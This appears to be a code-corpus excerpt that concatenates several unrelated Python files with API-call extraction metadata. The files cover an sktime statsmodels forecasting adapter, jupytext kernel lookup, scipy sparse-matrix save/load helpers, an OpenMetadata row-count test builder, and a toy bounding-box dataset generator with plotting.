] | [((562, 569), 'core.utility.Array', 'Array', ([], {}), '()\n', (567, 569), False, 'from core.utility import Array\n'), ((1689, 1714), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\n', (1704, 1714), False, 'from core.database import FromDB\n'), ((2326, 2351), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\n', (2341, 2351), False, 'from core.database import FromDB\n'), ((821, 828), 'core.utility.Array', 'Array', ([], {}), '()\n', (826, 828), False, 'from core.utility import Array\n'), ((649, 720), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\n', (655, 720), False, 'from action import Action\n'), ((1031, 1102), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\n', (1037, 1102), False, 'from action import Action\n')] |
#!/usr/bin/env python3 -u
# -*- coding: utf-8 -*-
__author__ = ["<NAME>"]
__all__ = ["_StatsModelsAdapter"]
import numpy as np
import pandas as pd
from sktime.forecasting.base._base import DEFAULT_ALPHA
from sktime.forecasting.base._sktime import _OptionalForecastingHorizonMixin
from sktime.forecasting.base._sktime import _SktimeForecaster
class _StatsModelsAdapter(_OptionalForecastingHorizonMixin, _SktimeForecaster):
"""Base class for interfacing statsmodels forecasting algorithms"""
_fitted_param_names = ()
def __init__(self):
self._forecaster = None
self._fitted_forecaster = None
super(_StatsModelsAdapter, self).__init__()
def fit(self, y, X=None, fh=None):
"""Fit to training data.
Parameters
----------
y : pd.Series
Target time series to which to fit the forecaster.
fh : int, list or np.array, optional (default=None)
            The forecaster's horizon with the steps ahead to predict.
X : pd.DataFrame, optional (default=None)
Exogenous variables are ignored
Returns
-------
self : returns an instance of self.
"""
# statsmodels does not support the pd.Int64Index as required,
# so we coerce them here to pd.RangeIndex
if isinstance(y, pd.Series) and type(y.index) == pd.Int64Index:
y, X = _coerce_int_to_range_index(y, X)
self._set_y_X(y, X)
self._set_fh(fh)
self._fit_forecaster(y, X)
self._is_fitted = True
return self
def _fit_forecaster(self, y_train, X_train=None):
"""Internal fit"""
raise NotImplementedError("abstract method")
def _predict(self, fh, X=None, return_pred_int=False, alpha=DEFAULT_ALPHA):
"""
Make forecasts.
Parameters
----------
fh : ForecastingHorizon
            The forecaster's horizon with the steps ahead to predict.
Default is one-step ahead forecast,
i.e. np.array([1])
X : pd.DataFrame, optional (default=None)
Exogenous variables are ignored.
return_pred_int : bool, optional (default=False)
alpha : int or list, optional (default=0.95)
Returns
-------
y_pred : pd.Series
Returns series of predicted values.
"""
if return_pred_int:
raise NotImplementedError()
# statsmodels requires zero-based indexing starting at the
# beginning of the training series when passing integers
start, end = fh.to_absolute_int(self._y.index[0], self.cutoff)[[0, -1]]
y_pred = self._fitted_forecaster.predict(start, end)
# statsmodels forecasts all periods from start to end of forecasting
# horizon, but only return given time points in forecasting horizon
return y_pred.loc[fh.to_absolute(self.cutoff).to_pandas()]
def get_fitted_params(self):
"""Get fitted parameters
Returns
-------
fitted_params : dict
"""
self.check_is_fitted()
return {
name: self._fitted_forecaster.params.get(name)
for name in self._get_fitted_param_names()
}
def _get_fitted_param_names(self):
"""Get names of fitted parameters"""
return self._fitted_param_names
def _coerce_int_to_range_index(y, X=None):
new_index = pd.RangeIndex(y.index[0], y.index[-1] + 1)
try:
np.testing.assert_array_equal(y.index, new_index)
except AssertionError:
raise ValueError(
"Coercion of pd.Int64Index to pd.RangeIndex "
"failed. Please provide `y_train` with a "
"pd.RangeIndex."
)
y.index = new_index
if X is not None:
X.index = new_index
return y, X
| [
"numpy.testing.assert_array_equal",
"pandas.RangeIndex"
] | [((3433, 3475), 'pandas.RangeIndex', 'pd.RangeIndex', (['y.index[0]', '(y.index[-1] + 1)'], {}), '(y.index[0], y.index[-1] + 1)\n', (3446, 3475), True, 'import pandas as pd\n'), ((3493, 3542), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['y.index', 'new_index'], {}), '(y.index, new_index)\n', (3522, 3542), True, 'import numpy as np\n')] |
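
As an illustration of how this adapter is meant to be specialized, here is a hypothetical concrete subclass that wires in statsmodels' SimpleExpSmoothing; the class name and parameter choice are assumptions for demonstration, not part of the file above, and it assumes `_StatsModelsAdapter` is in scope.

from statsmodels.tsa.holtwinters import SimpleExpSmoothing

class _SESForecaster(_StatsModelsAdapter):
    """Hypothetical wrapper: simple exponential smoothing via statsmodels."""
    _fitted_param_names = ("smoothing_level",)

    def _fit_forecaster(self, y_train, X_train=None):
        # fit the underlying statsmodels model; the fitted results object
        # provides the .predict(start, end) call used by _predict above
        self._forecaster = SimpleExpSmoothing(y_train)
        self._fitted_forecaster = self._forecaster.fit()
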
"""Find kernel specifications for a given language"""
import os
import sys
from .languages import same_language
from .reraise import reraise
try:
# I prefer not to take a dependency on jupyter_client
from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec
except ImportError as err:
find_kernel_specs = reraise(err)
get_kernel_spec = reraise(err)
def set_kernelspec_from_language(notebook):
"""Set the kernel specification based on the 'main_language' metadata"""
language = notebook.metadata.get("jupytext", {}).get("main_language")
if "kernelspec" not in notebook.metadata and language:
try:
kernelspec = kernelspec_from_language(language)
except ValueError:
return
notebook.metadata["kernelspec"] = kernelspec
notebook.metadata.get("jupytext", {}).pop("main_language")
def kernelspec_from_language(language):
"""Return the python kernel that matches the current env, or the first kernel that matches the given language"""
if language == "python":
# Return the kernel that matches the current Python executable
for name in find_kernel_specs():
kernel_specs = get_kernel_spec(name)
cmd = kernel_specs.argv[0]
if (
kernel_specs.language == "python"
and os.path.isfile(cmd)
and os.path.samefile(cmd, sys.executable)
):
return {
"name": name,
"language": language,
"display_name": kernel_specs.display_name,
}
raise ValueError(
"No kernel found that matches the current python executable {}\n".format(
sys.executable
)
+ "Install one with 'python -m ipykernel install --name kernel_name [--user]'"
)
for name in find_kernel_specs():
kernel_specs = get_kernel_spec(name)
if same_language(kernel_specs.language, language):
return {
"name": name,
"language": language,
"display_name": kernel_specs.display_name,
}
raise ValueError("No kernel found for the language {}".format(language))
| [
"jupyter_client.kernelspec.find_kernel_specs",
"jupyter_client.kernelspec.get_kernel_spec",
"os.path.samefile",
"os.path.isfile"
] | [((1903, 1922), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\n', (1920, 1922), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1157, 1176), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\n', (1174, 1176), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1947, 1968), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\n', (1962, 1968), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1205, 1226), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\n', (1220, 1226), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1353, 1372), 'os.path.isfile', 'os.path.isfile', (['cmd'], {}), '(cmd)\n', (1367, 1372), False, 'import os\n'), ((1393, 1430), 'os.path.samefile', 'os.path.samefile', (['cmd', 'sys.executable'], {}), '(cmd, sys.executable)\n', (1409, 1430), False, 'import os\n')] |
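
A small usage sketch of the helper defined above, assuming jupyter_client, ipykernel, and nbformat are installed and a Python kernel is registered for the running interpreter:

import nbformat

nb = nbformat.v4.new_notebook()
nb.metadata["jupytext"] = {"main_language": "python"}
set_kernelspec_from_language(nb)          # fills nb.metadata["kernelspec"] in place when a matching kernel is found
print(nb.metadata.get("kernelspec", {}))  # e.g. {'name': 'python3', 'language': 'python', ...}
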
import numpy as np
import scipy.sparse
__all__ = ['save_npz', 'load_npz']
# Make loading safe vs. malicious input
PICKLE_KWARGS = dict(allow_pickle=False)
def save_npz(file, matrix, compressed=True):
""" Save a sparse matrix to a file using ``.npz`` format.
Parameters
----------
file : str or file-like object
Either the file name (string) or an open file (file-like object)
where the data will be saved. If file is a string, the ``.npz``
extension will be appended to the file name if it is not already
there.
    matrix: spmatrix (format: ``csc``, ``csr``, ``bsr``, ``dia`` or ``coo``)
The sparse matrix to save.
compressed : bool, optional
Allow compressing the file. Default: True
See Also
--------
scipy.sparse.load_npz: Load a sparse matrix from a file using ``.npz`` format.
numpy.savez: Save several arrays into a ``.npz`` archive.
numpy.savez_compressed : Save several arrays into a compressed ``.npz`` archive.
Examples
--------
Store sparse matrix to disk, and load it again:
>>> import scipy.sparse
>>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]]))
>>> sparse_matrix
<2x3 sparse matrix of type '<class 'numpy.int64'>'
with 2 stored elements in Compressed Sparse Column format>
>>> sparse_matrix.todense()
matrix([[0, 0, 3],
[4, 0, 0]], dtype=int64)
>>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix)
>>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz')
>>> sparse_matrix
<2x3 sparse matrix of type '<class 'numpy.int64'>'
with 2 stored elements in Compressed Sparse Column format>
>>> sparse_matrix.todense()
matrix([[0, 0, 3],
[4, 0, 0]], dtype=int64)
"""
arrays_dict = {}
if matrix.format in ('csc', 'csr', 'bsr'):
arrays_dict.update(indices=matrix.indices, indptr=matrix.indptr)
elif matrix.format == 'dia':
arrays_dict.update(offsets=matrix.offsets)
elif matrix.format == 'coo':
arrays_dict.update(row=matrix.row, col=matrix.col)
else:
raise NotImplementedError('Save is not implemented for sparse matrix of format {}.'.format(matrix.format))
arrays_dict.update(
format=matrix.format.encode('ascii'),
shape=matrix.shape,
data=matrix.data
)
if compressed:
np.savez_compressed(file, **arrays_dict)
else:
np.savez(file, **arrays_dict)
def load_npz(file):
""" Load a sparse matrix from a file using ``.npz`` format.
Parameters
----------
file : str or file-like object
Either the file name (string) or an open file (file-like object)
where the data will be loaded.
Returns
-------
result : csc_matrix, csr_matrix, bsr_matrix, dia_matrix or coo_matrix
A sparse matrix containing the loaded data.
Raises
------
OSError
If the input file does not exist or cannot be read.
See Also
--------
scipy.sparse.save_npz: Save a sparse matrix to a file using ``.npz`` format.
numpy.load: Load several arrays from a ``.npz`` archive.
Examples
--------
Store sparse matrix to disk, and load it again:
>>> import scipy.sparse
>>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]]))
>>> sparse_matrix
<2x3 sparse matrix of type '<class 'numpy.int64'>'
with 2 stored elements in Compressed Sparse Column format>
>>> sparse_matrix.todense()
matrix([[0, 0, 3],
[4, 0, 0]], dtype=int64)
>>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix)
>>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz')
>>> sparse_matrix
<2x3 sparse matrix of type '<class 'numpy.int64'>'
with 2 stored elements in Compressed Sparse Column format>
>>> sparse_matrix.todense()
matrix([[0, 0, 3],
[4, 0, 0]], dtype=int64)
"""
with np.load(file, **PICKLE_KWARGS) as loaded:
try:
matrix_format = loaded['format']
except KeyError as e:
raise ValueError('The file {} does not contain a sparse matrix.'.format(file)) from e
matrix_format = matrix_format.item()
if not isinstance(matrix_format, str):
# Play safe with Python 2 vs 3 backward compatibility;
# files saved with SciPy < 1.0.0 may contain unicode or bytes.
matrix_format = matrix_format.decode('ascii')
try:
cls = getattr(scipy.sparse, '{}_matrix'.format(matrix_format))
except AttributeError as e:
raise ValueError('Unknown matrix format "{}"'.format(matrix_format)) from e
if matrix_format in ('csc', 'csr', 'bsr'):
return cls((loaded['data'], loaded['indices'], loaded['indptr']), shape=loaded['shape'])
elif matrix_format == 'dia':
return cls((loaded['data'], loaded['offsets']), shape=loaded['shape'])
elif matrix_format == 'coo':
return cls((loaded['data'], (loaded['row'], loaded['col'])), shape=loaded['shape'])
else:
raise NotImplementedError('Load is not implemented for '
'sparse matrix of format {}.'.format(matrix_format))
| [
"numpy.savez_compressed",
"numpy.load",
"numpy.savez"
] | [((2426, 2466), 'numpy.savez_compressed', 'np.savez_compressed', (['file'], {}), '(file, **arrays_dict)\n', (2445, 2466), True, 'import numpy as np\n'), ((2485, 2514), 'numpy.savez', 'np.savez', (['file'], {}), '(file, **arrays_dict)\n', (2493, 2514), True, 'import numpy as np\n'), ((4018, 4048), 'numpy.load', 'np.load', (['file'], {}), '(file, **PICKLE_KWARGS)\n', (4025, 4048), True, 'import numpy as np\n')] |
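
Beyond the file-path examples in the docstrings, both helpers also accept file-like objects, so a quick in-memory round trip looks like this (using the functions defined above):

import io
import numpy as np
from scipy.sparse import csr_matrix

buf = io.BytesIO()
save_npz(buf, csr_matrix(np.eye(3)))   # write the archive into the buffer
buf.seek(0)
restored = load_npz(buf)
print(restored.format, restored.nnz)     # csr 3
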
# Copyright 2022 Collate
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
TestCase builder
"""
from metadata.generated.schema.api.tests.createTableTest import CreateTableTestRequest
from metadata.generated.schema.tests.table import tableRowCountToEqual
from metadata.generated.schema.tests.tableTest import TableTestType
from metadata.great_expectations.builders.table.base_table_test_builders import (
BaseTableTestBuilder,
)
class TableRowCountToEqualBuilder(BaseTableTestBuilder):
"""Builder for `expect_table_row_count_to_equal` GE expectation"""
def _build_test(self) -> CreateTableTestRequest:
"""Specific test builder for the test"""
return self.build_test_request(
config=tableRowCountToEqual.TableRowCountToEqual(
value=self.result["expectation_config"]["kwargs"]["value"],
),
test_type=TableTestType.tableRowCountToEqual,
)
| [
"metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual"
] | [((1225, 1331), 'metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual', 'tableRowCountToEqual.TableRowCountToEqual', ([], {'value': "self.result['expectation_config']['kwargs']['value']"}), "(value=self.result[\n 'expectation_config']['kwargs']['value'])\n", (1266, 1331), False, 'from metadata.generated.schema.tests.table import tableRowCountToEqual\n')] |
'''
This code is based on https://github.com/jrieke/shape-detection/
'''
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
import tensorflow as tf
import datetime
class JriekeBboxDataset:
def generate(self):
print('Generating...')
self.WIDTH = 8
self.HEIGHT = 8
num_imgs = 50000
min_object_size = 1
max_object_size = 4
num_objects = 1
self.bboxes = np.zeros((num_imgs, num_objects, 4))
self.imgs = np.zeros((num_imgs, self.WIDTH, self.HEIGHT)) # set background to 0
for i_img in range(num_imgs):
for i_object in range(num_objects):
w, h = np.random.randint(min_object_size, max_object_size, size=2)
x = np.random.randint(0, self.WIDTH - w)
y = np.random.randint(0, self.HEIGHT - h)
self.imgs[i_img, y:y+h, x:x+w] = 1. # set rectangle to 1
self.bboxes[i_img, i_object] = [x, y, w, h]
print("Shapes: imgs ", self.imgs.shape, " bboxes ", self.bboxes.shape)
#why this?
# X = (self.imgs.reshape(num_imgs, -1) - np.mean(self.imgs)) / np.std(self.imgs)
X = self.imgs
y = self.bboxes.reshape(num_imgs, -1) / self.WIDTH
# Split training and test.
i = int(0.8 * num_imgs)
train_X = X[:i] #80% for training
test_X = X[i:]
train_y = y[:i]
test_y = y[i:]
self.test_imgs = self.imgs[i:]
self.test_bboxes = self.bboxes[i:]
return train_X, train_y, test_X, test_y
def check_dataset_image_compability(self, test_X_sample, test_imgs_sample):
fig = plt.figure(figsize=(12, 3))
fig.suptitle('check if the generated imgs match to the test_X slice image')
fig.subplots_adjust(top=0.85)
plt.subplot(1, 2, 1)
plt.gca().set_title('Returned by the dataset class: used for training')
plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
plt.subplot(1, 2, 2)
plt.gca().set_title('Global image holder: used for plotting.')
plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
plt.show()
        print('compare:',test_X_sample,test_imgs_sample)
def IOU(self,bbox1, bbox2):
'''Calculate overlap between two bounding boxes [x, y, w, h] as the area of intersection over the area of unity'''
x1, y1, w1, h1 = bbox1[0], bbox1[1], bbox1[2], bbox1[3]
x2, y2, w2, h2 = bbox2[0], bbox2[1], bbox2[2], bbox2[3]
w_I = min(x1 + w1, x2 + w2) - max(x1, x2)
h_I = min(y1 + h1, y2 + h2) - max(y1, y2)
if w_I <= 0 or h_I <= 0: # no overlap
return 0.
I = w_I * h_I
U = w1 * h1 + w2 * h2 - I
return I / U
def convertDefaultAnnotToCoord(self, annot):
'''
annot -> [x, y, w, h]
'''
w = annot[2] * self.WIDTH
h = annot[3] * self.HEIGHT
x = annot[0] * self.HEIGHT
y = annot[1] * self.HEIGHT
return [x,y,w,h]
def convertYoloAnnotToCoord(self, yolo_annot):
'''
yolo_annot -> [x, y, w, h]
'''
w = yolo_annot[2] * self.WIDTH
h = yolo_annot[3] * self.HEIGHT
x = (yolo_annot[0] * self.WIDTH) - (w/2)
y = (yolo_annot[1] * self.HEIGHT) - (h/2)
return [x,y,w,h]
def show_generated(self, i=0):
fig = plt.figure()
fig.subplots_adjust(top=0.85)
fig.suptitle('Generated image sample + GT')
plt.imshow(self.imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
for bbox in self.bboxes[i]:
plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none'))
plt.gca().legend(['GT'])
plt.show()
def plot_rectangle(self, img, bbox):
fig = plt.figure()
fig.suptitle('Plotting rectangle.')
fig.subplots_adjust(top=0.85)
plt.subplot(1, 1, 1)
plt.imshow(img, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none'))
plt.show()
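    # Note: the following definition overrides the check_dataset_image_compability method defined earlier in this class.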
def check_dataset_image_compability(self, test_X_sample, test_imgs_sample):
fig = plt.figure(figsize=(12, 3))
fig.suptitle('check if the generated imgs match to the test_X slice image')
fig.subplots_adjust(top=0.85)
plt.subplot(1, 2, 1)
plt.gca().set_title('Returned by the dataset class: used for training')
plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
plt.subplot(1, 2, 2)
plt.gca().set_title('Global image holder: used for plotting.')
plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
plt.show()
print('compare:',test_X_sample,test_imgs_sample)
def show_predicted(self, pred_bboxes):
# Show a few images and predicted bounding boxes from the test dataset.
fig = plt.figure(figsize=(12, 3))
fig.subplots_adjust(top=0.85)
fig.suptitle('Prediction demonstration. Random samples.')
legend_plotted = False
for i_subplot in range(1, 11):
plt.subplot(1, 10, i_subplot)
i = np.random.randint(len(pred_bboxes))
plt.imshow(self.test_imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
for pred_bbox, exp_bbox in zip(pred_bboxes[i], self.test_bboxes[i]):
# print('before convertion: pred',pred_bbox, 'gt',exp_bbox)
pred_bbox = self.convertDefaultAnnotToCoord(pred_bbox)
# exp_bbox = self.convertDefaultAnnotToCoord(exp_bbox)
print('after convertion: pred',pred_bbox, 'gt',exp_bbox)
plt.gca().add_patch(matplotlib.patches.Rectangle((pred_bbox[0], pred_bbox[1]), pred_bbox[2], pred_bbox[3], ec='r', fc='none'))
#gt
plt.gca().add_patch(matplotlib.patches.Rectangle((exp_bbox[0], exp_bbox[1]), exp_bbox[2], exp_bbox[3], ec='b', fc='none'))
plt.annotate('IOU: {:.2f}'.format(self.IOU(pred_bbox, exp_bbox)), (pred_bbox[0], pred_bbox[1]+pred_bbox[3]+0.2), color='r')
if not legend_plotted:
legend_plotted = True
plt.gca().legend(['Pred','GT'],loc='upper center', bbox_to_anchor=(0.5, -0.5), fancybox=True)
plt.show()
# plt.savefig('plots/bw-single-rectangle_prediction_{0:%Y-%m-%d%H:%M:%S}.png'.format(datetime.datetime.now()), dpi=300)
| [
"matplotlib.pyplot.imshow",
"matplotlib.patches.Rectangle",
"matplotlib.pyplot.gca",
"numpy.zeros",
"matplotlib.pyplot.figure",
"numpy.random.randint",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.show"
] | [((440, 476), 'numpy.zeros', 'np.zeros', (['(num_imgs, num_objects, 4)'], {}), '((num_imgs, num_objects, 4))\n', (448, 476), True, 'import numpy as np\n'), ((497, 542), 'numpy.zeros', 'np.zeros', (['(num_imgs, self.WIDTH, self.HEIGHT)'], {}), '((num_imgs, self.WIDTH, self.HEIGHT))\n', (505, 542), True, 'import numpy as np\n'), ((1662, 1689), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (1672, 1689), True, 'import matplotlib.pyplot as plt\n'), ((1821, 1841), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (1832, 1841), True, 'import matplotlib.pyplot as plt\n'), ((1930, 2052), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_X_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (1940, 2052), True, 'import matplotlib.pyplot as plt\n'), ((2057, 2077), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (2068, 2077), True, 'import matplotlib.pyplot as plt\n'), ((2157, 2282), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_imgs_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (2167, 2282), True, 'import matplotlib.pyplot as plt\n'), ((2286, 2296), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2294, 2296), True, 'import matplotlib.pyplot as plt\n'), ((3515, 3527), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (3525, 3527), True, 'import matplotlib.pyplot as plt\n'), ((3626, 3746), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.imgs[i]'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(self.imgs[i], cmap='Greys', interpolation='none', origin='lower',\n extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (3636, 3746), True, 'import matplotlib.pyplot as plt\n'), ((3943, 3953), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3951, 3953), True, 'import matplotlib.pyplot as plt\n'), ((4011, 4023), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4021, 4023), True, 'import matplotlib.pyplot as plt\n'), ((4115, 4135), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(1)', '(1)'], {}), '(1, 1, 1)\n', (4126, 4135), True, 'import matplotlib.pyplot as plt\n'), ((4144, 4256), 'matplotlib.pyplot.imshow', 'plt.imshow', (['img'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(img, cmap='Greys', interpolation='none', origin='lower', extent=\n [0, self.WIDTH, 0, self.HEIGHT])\n", (4154, 4256), True, 'import matplotlib.pyplot as plt\n'), ((4375, 4385), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4383, 4385), True, 'import matplotlib.pyplot as plt\n'), ((4481, 4508), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (4491, 4508), True, 'import matplotlib.pyplot as plt\n'), ((4640, 4660), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (4651, 4660), True, 'import matplotlib.pyplot as plt\n'), ((4749, 4871), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': 
'"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_X_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (4759, 4871), True, 'import matplotlib.pyplot as plt\n'), ((4876, 4896), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (4887, 4896), True, 'import matplotlib.pyplot as plt\n'), ((4976, 5101), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_imgs_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (4986, 5101), True, 'import matplotlib.pyplot as plt\n'), ((5105, 5115), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5113, 5115), True, 'import matplotlib.pyplot as plt\n'), ((5312, 5339), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (5322, 5339), True, 'import matplotlib.pyplot as plt\n'), ((6760, 6770), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6768, 6770), True, 'import matplotlib.pyplot as plt\n'), ((4280, 4369), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r',\n fc='none')\n", (4308, 4369), False, 'import matplotlib\n'), ((5527, 5556), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(10)', 'i_subplot'], {}), '(1, 10, i_subplot)\n', (5538, 5556), True, 'import matplotlib.pyplot as plt\n'), ((5621, 5747), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.test_imgs[i]'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(self.test_imgs[i], cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (5631, 5747), True, 'import matplotlib.pyplot as plt\n'), ((676, 735), 'numpy.random.randint', 'np.random.randint', (['min_object_size', 'max_object_size'], {'size': '(2)'}), '(min_object_size, max_object_size, size=2)\n', (693, 735), True, 'import numpy as np\n'), ((756, 792), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.WIDTH - w)'], {}), '(0, self.WIDTH - w)\n', (773, 792), True, 'import numpy as np\n'), ((813, 850), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.HEIGHT - h)'], {}), '(0, self.HEIGHT - h)\n', (830, 850), True, 'import numpy as np\n'), ((1850, 1859), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1857, 1859), True, 'import matplotlib.pyplot as plt\n'), ((2086, 2095), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2093, 2095), True, 'import matplotlib.pyplot as plt\n'), ((3811, 3900), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r',\n fc='none')\n", (3839, 3900), False, 'import matplotlib\n'), ((4260, 4269), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4267, 4269), True, 'import matplotlib.pyplot as plt\n'), ((4669, 4678), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4676, 4678), True, 'import matplotlib.pyplot as plt\n'), ((4905, 4914), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4912, 4914), True, 'import matplotlib.pyplot as plt\n'), ((3791, 
